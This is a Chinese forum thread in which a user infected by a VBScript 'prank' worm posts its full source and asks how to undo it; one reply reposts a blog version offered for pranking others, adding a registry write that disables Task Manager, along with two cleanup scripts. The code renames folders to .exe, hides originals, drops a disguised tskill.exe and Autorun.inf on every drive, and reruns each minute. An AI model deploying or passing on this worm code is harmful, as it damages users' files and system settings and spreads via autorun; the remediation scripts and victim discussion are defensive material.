VBS整人代码的破解

mouse_event 2011-08-26 05:23:33
急病乱投医,竟然跑到这儿来了,被人用VBS给黑了,代码如下,他说他也不会破解,给了我代码,代码如下,求解:
On Error Resume Next
Set fso=CreateObject("Scripting.FileSystemObject")
Set Cx=fso.GetSpecialFolder(0)
fso.GetFile(WScript.ScriptFullName).Delete(True)
Do
C=fso.GetParentFolderName(Cx)
Set Fdrs=fso.GetFolder(C).SubFolders

For Each Fdr In Fdrs
If Not fso.GetExtensionName(Fdr.Name)="exe" Then
fso.CreateFolder(C & Fdr.Name & ".exe")
Set fun=fso.GetFile(C & "WINDOWS\system32\tskill.exe")
fun.Attributes=6
fun.Copy(C & Fdr.Name & ".exe\fun.xls.exe")
Set auto=fso.CreateTextFile(C & Fdr.Name & ".exe\Autorun.inf")
auto.WriteLine("[Autorun]")
auto.WriteLine("Open=fun.xls.exe")
auto.Close
Set auto=Nothing
Set fun=Nothing
fso.GetFolder(C & Fdr.Name & ".exe").Attributes=Fdr.Attributes
Fdr.Attributes=6
End If
Next

Set Cx=Nothing
Set Fdrs=Nothing

Set drvs=fso.Drives
For Each drv In drvs
If drv.DriveType=2 Then
If drv & "\" = C Then
Else
Set Fdrs=fso.GetFolder(drv).SubFolders

For Each Fdr In Fdrs
If Not fso.GetExtensionName(Fdr.Name)="exe" Then
Fdr.Name=Fdr.name & ".exe"
Set fun=fso.GetFile(C & "WINDOWS\system32\tskill.exe")
fun.Copy(drv & "\" & Fdr.Name & "\fun.xls.exe")
Set auto=fso.CreateTextFile(drv & "\" & Fdr.Name & "\Autorun.inf")
auto.WriteLine("[Autorun]")
auto.WriteLine("Open=fun.xls.exe")
auto.Close
Set auto=Nothing
Set fun=Nothing
End If
Next

End If
End If
Next
WScript.Sleep 60*1000
Loop
效果如下:
1.桌面几乎全部快捷方式被删除
2.所有文件夹被重名名为文件夹名.exe
3.几乎所有文件关联失效
4。每个文件夹内都会有一个内容为:
[Autorun]
Open=fun.xls.exe
的AUTORUN.INF的文件和一个
fun.xls.exe的隐藏文件

...全文
2297 9 打赏 收藏 转发到动态 举报
写回复
用AI写文章
9 条回复
切换为时间正序
请发表友善的回复…
发表回复
jimmy88jimmy 2014-05-20
  • 打赏
  • 举报
回复
在运行一下就好了,相信我!
qq416588322 2012-08-02
  • 打赏
  • 举报
回复
我也被恶搞了 求解我在网上到找不到解决方法
stevenlelehaha 2012-06-08
  • 打赏
  • 举报
回复
这里有个相似的,不知道有木有用:
第一个
第二个
下面是原文:
第一个:
VBS 制作 冒牌文件夹同名病毒(正式版)
原创作品,欢迎分享(为了能够不断改进程序,分享请注明来源:http://hi.baidu.com/trodropper)
注:诺顿查不出问题,相信其他杀软也查不出来,但360杀毒报毒:Generic.ScriptWorm.3389A2B2(360杀毒太强悍了,没办法)
简单介绍一下功能:
1.根目录下的文件夹带有"exe"扩展名;
2.根目录下生成"Autorun.inf"文件;
3.根目录下生成"fun.xls.exe"文件(系统隐藏文件,必须去掉隐藏才能看见);
4.运行后自动删除自己;
5.每隔1分钟运行一次;
6.禁用任务管理器。
怎么样,行为像一个病毒吧?(我是故意让某些“马脚”露出的,不然别人都发现不了自己中招,还整个冇啊!)
我没有设置开机自启(方法也很简单,不过修改注册表不是一个好方法,360会有提示的),大家玩笑不要开得过火,玩玩就可以啦~
代码如下:
On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set Cx=fso.GetSpecialFolder(0) fso.GetFile(WScript.ScriptFullName).Delete(True) Set ws=CreateObject("WScript.Shell") ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr",1,"REG_DWORD" Do C=fso.GetParentFolderName(Cx) Set Fdrs=fso.GetFolder(C).SubFolders  For Each Fdr In Fdrs If Not fso.GetExtensionName(Fdr.Name)="exe" Then fso.CreateFolder(C & Fdr.Name & ".exe") fso.GetFolder(C & Fdr.Name & ".exe").Attributes=Fdr.Attributes Fdr.Attributes=6 End If Next  Set Cx=Nothing Set Fdrs=Nothing  Set drvs=fso.Drives For Each drv In drvs If drv.DriveType=2 Then Set fun=fso.GetFile(C & "WINDOWS\system32\tskill.exe") fun.Attributes=6 fun.Copy(drv & "\fun.xls.exe") Set auto=fso.CreateTextFile(drv & "\Autorun.inf") auto.WriteLine("[Autorun]") auto.WriteLine("Open=fun.xls.exe") auto.Close Set auto=Nothing Set fun=Nothing If drv & "\" = C Then Else Set Fdrs=fso.GetFolder(drv & "\").SubFolders  For Each Fdr In Fdrs If Not fso.GetExtensionName(Fdr.Name)="exe" Then Fdr.Name=Fdr.name & ".exe" End If Next  End If End If Next WScript.Sleep 60*1000 Loop


很像吧!

第二个:

原创作品,欢迎分享(为了能够不断改进程序,分享请注明来源:http://hi.baidu.com/trodropper)
已在多台电脑上多次实验过,绝对安全!
代价先制作两个文件:
文件1:CAutorun_1.vbs
代码如下:
  Set ws=CreateObject("WScript.Shell") ws.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr",0,"REG_DWORD" MsgBox "请用任务管理器结束所有wscript.exe进程!",64,"最聪明的猪"  

文件2:CAutorun_2.vbs
代码如下:
On Error Resume Next  Set fso=CreateObject("Scripting.FileSystemObject") Set Cx=fso.GetSpecialFolder(0) C=fso.GetParentFolderName(Cx) Set Fdrs=fso.GetFolder(C).SubFolders  For Each Fdr In Fdrs If fso.GetExtensionName(Fdr.Name)="exe" Then fso.GetFolder(C & Fdr.Name).Delete(True) End If Next  Set drvs=fso.Drives For Each drv In drvs If drv.DriveType=2 Then fso.GetFile(drv & "\Autorun.inf").Delete(True) fso.GetFile(drv & "\fun.xls.exe").Delete(True) If drv & "\" = C Then Else Set Fdrs=fso.GetFolder(drv & "\").SubFolders  For Each Fdr In Fdrs If fso.GetExtensionName(Fdr.Name)="exe" Then Fdr.Name=fso.GetBaseName(Fdr.Name) End If Next End If End If Next  fso.GetFolder(C & "Program Files").Attributes=0 fso.GetFolder(C & "Documents and Settings").Attributes=0 fso.GetFolder(C & "WINDOWS").Attributes=0  MsgBox "冒牌Autorun病毒清除完毕!",64,"最聪明的猪"

使用方法: 1.运行"CAutorun_1.vbs"; 2.打开任务管理器,结束"wscript.exe"进程; 3.运行"CAutorun_2.vbs"; 4.搞定! 注:最好两个文件放在桌面运行,并关闭其他窗口;可能有个别文件夹不能回复(是回收站,因为系统会自动创建),手动删除即可。

注意:不是我写的!
zhuode_001 2011-08-27
  • 打赏
  • 举报
回复
楼主贴出来代码,可能被人恶意利用哦
lxd964200983 2011-08-27
  • 打赏
  • 举报
回复
这个东西用什么方式运行的,我也想嘿嘿-------
还望各位指教
Forever_Young 2011-08-27
  • 打赏
  • 举报
回复
脚本写的不怎么样,心黑脸皮厚就行了。
Mnky 2011-08-27
  • 打赏
  • 举报
回复
这个毒还真遇到过,不过一眼就看穿了。。。
用文件夹+.exe的方式,我见过的只有fun.xls这个毒,确实比较搞笑~
weishenmobuxing 2011-08-27
  • 打赏
  • 举报
回复
langhunld 2011-08-26
  • 打赏
  • 举报
回复
都这样了还搞个毛啊……
代码不难,功能也很明确,但这东西是不可逆的啊,快捷方式删了找回来很麻烦,不如自己重建吧。文件关联被删了这个有点老火,可以考虑在别人的机器里把文件关联的注册表文件导出来再导入你的注册表,那些由VBS建的文件手动删吧,有水平可以自己写程序删,反正我搞不定……

9,506

社区成员

发帖
与我相关
我的任务
社区描述
Windows专区 安全技术/病毒
社区管理员
  • 安全技术/病毒社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧